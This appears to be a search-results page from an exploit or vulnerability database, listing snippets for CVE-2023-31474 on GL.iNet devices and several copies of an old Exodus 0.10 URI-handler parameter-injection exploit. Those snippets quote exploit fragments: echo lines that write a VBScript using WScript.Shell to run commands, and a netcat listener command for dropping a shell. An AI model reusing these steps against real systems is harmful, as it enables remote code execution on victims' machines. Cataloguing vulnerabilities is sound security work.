9 matches found
CVE-2023-31474
An issue was discovered on GL.iNet devices before 3.216. Through the software installation feature, it is possible to inject arbitrary parameters in a request to cause opkg to obtain a list of files in a specific directory, by using the regex feature in a package name...
CVE-2023-31474
GL.iNet devices before 3.216 are affected by CVE-2023-31474 due to a flaw in the software installation feature that lets an attacker inject arbitrary parameters via a regex in a package name, causing opkg to list files in a target directory. The issue stems from how package-name regex handling ca...
Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit
No description provided by source. !-- Exodus v0.10 remote code execution exploit by Nine:Situations:Group::strawdog This uses the "-l" argument to overwrite a file inside Microsoft Help and Support Center folders oh rgod... Firstly run netcat in listen mode to drop the vbscript shell run this...
Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit
Exploit for unknown platform in category remote exploits =============================================================== Exodus 0.10 uri handler Arbitrary Parameter Injection Exploit =============================================================== testfile echo Dim wshShell testfile echo Set...
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)
Exodus 0.10 - URI Handler Arbitrary Parameter Injection 2 testfile echo Dim wshShell testfile echo Set wshShell = CreateObject"WScript.Shell" testfile echo wshShell.Run"cmd /c start calc" testfile echo ^ testfile nc -L -s 192.168.0.1 -p 5222 -vv click me click me milw0rm.com 2008-11-20...
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)
testfile echo Dim wshShell testfile echo Set wshShell = CreateObject"WScript.Shell" testfile echo wshShell.Run"cmd /c start calc" testfile echo ^ testfile nc -L -s 192.168.0.1 -p 5222 -vv click me click me milw0rm.com 2008-11-20...
Exodus v0.10 uri handler arbitrary parameter injection
-------------------------------------------------------------------------------- Exodus v0.10 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems because of an installation bug...
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)
-------------------------------------------------------------------------------- Exodus v0.10 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems because of an installation bug...
Exodus 0.10 (uri handler) Arbitrary Parameter Injection Vulnerability
Exploit for unknown platform in category remote exploits ===================================================================== Exodus 0.10 uri handler Arbitrary Parameter Injection Vulnerability =====================================================================...